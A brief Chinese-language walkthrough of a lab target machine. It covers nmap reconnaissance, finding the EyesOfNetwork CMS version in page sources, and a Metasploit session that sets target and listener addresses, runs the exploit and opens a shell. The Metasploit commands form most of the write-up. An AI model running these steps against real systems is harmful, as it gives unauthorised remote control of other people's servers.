前言提要

有史以来最简单的一个靶机，话不多说直接搞

信息收集

nmap扫描靶机IP

出来一个80端口，直接往页面去（是一个登录页面）

查看源代码没有东西，里面有很多css链接.就一个个的点开看了看，最终找到了CMS版本号

漏洞基本上都是基于版本来的，可能早期版本有后期就修复了。

MSF提权

msfconsole

search eyesofnetwork
use 0
set rhost 192.168.xxx.xxx
set lhost 192.168.132.139
show options
run

攻击成功查看权限

shell
id